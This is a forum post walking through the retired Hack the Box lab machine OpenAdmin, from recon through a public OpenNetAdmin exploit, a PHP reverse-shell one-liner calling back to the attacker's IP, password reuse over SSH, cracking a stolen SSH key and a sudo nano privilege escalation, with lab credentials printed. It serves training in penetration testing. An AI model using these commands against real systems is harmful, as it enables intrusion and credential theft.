Hack the Box – OpenAdmin Walkthrough

Today, we’re going to solve another CTF machine OpenAdmin. It is now a retired box and can be accessible to VIP members.

Specifications

  • Target OS : Linux
  • Services : SSH, HTTP
  • IP Address : 10.10.10.171
  • Difficulty : Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA 10.10.10.171

Enumerating Port 80

By running gobuster we found /music and /artwork directory with 301 status code.

gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.171/ -s '200,204,301,302,307,403,500' -e | tee '/root/htb/10.10.10.171/scans/10.10.10.171_80_gobuster_common.txt'

Enumerating Music Directory

If we browse URL http://10.10.10.171/music

If we click on login there’s OpenNetAdmin installed.

Let’s enumerate OpenNetAdmin and Google what really it is?

Searchsploit

There’s an OpenNetAdmin installed

searchsploit

Since our target version of OpenNetAdmin is 18.1.1 we got two exploits for it.

Let’s searchsploit -m exploits/php/webapps/47691.sh.

I tried to run exploit it didn’t work for some reason.

I had to dos2unix 4691.sh

dos2unix

And we got low privilege shell.

By going through ona config file we found a database creds.

database

Database

        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',

Foothold

Let’s try getting a proper shell first.

I tired every reverse shell such as Perl, Python, and bash none of them worked for me.

I did wget p0wny-shell and uploaded it and got a reverse shell through that way.

php -r '$sock=fsockopen("10.10.14.242",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

And got a reverse shell instant.

nc

nc ls

Seems like we don’t have permission to both of the directories.

If you remember we had SQL Database let’s dump it.

We don’t have access to SQL or neither SQLDump is installed.

There’s a reused password for jimmy.

lets SSH to jimmy with SQL creds which we found.

ssh [email protected] 
n1nj4W4rri0R!

After doing some enumeration and looking for something interesting.

We got!

If you take a look at main.php we’ll see it’s our way to get joanna ssh private key. But we don’t know where it’s hosted let’s take a look at apache config.

apache2

If you take a look at internal.conf and we’ll see it’s running on port 52846. Let’s make sure if that port is opened for us.

Seems like it’s only opened for the local network but luckily we’re already on the network.

curl localhost:52846/main.php

And we got joanna private ssh key.

Let’s crack it using https://github.com/quarantin/rsakey-cracker

And we got the password!

bloodninjas

let’s do SSH login as joanna.

ssh -i key [email protected] - bloodninjas

Now, that we’re login as joanna let’s do some enumeration.

joanna

Privilege Escalation

If we do sudo -l

joanna can sudo run nano to read /opt/priv without password

input to sudo /bin/nano /opt/priv enter nano editor

2 Likes

It is simple and easy to understand thank you.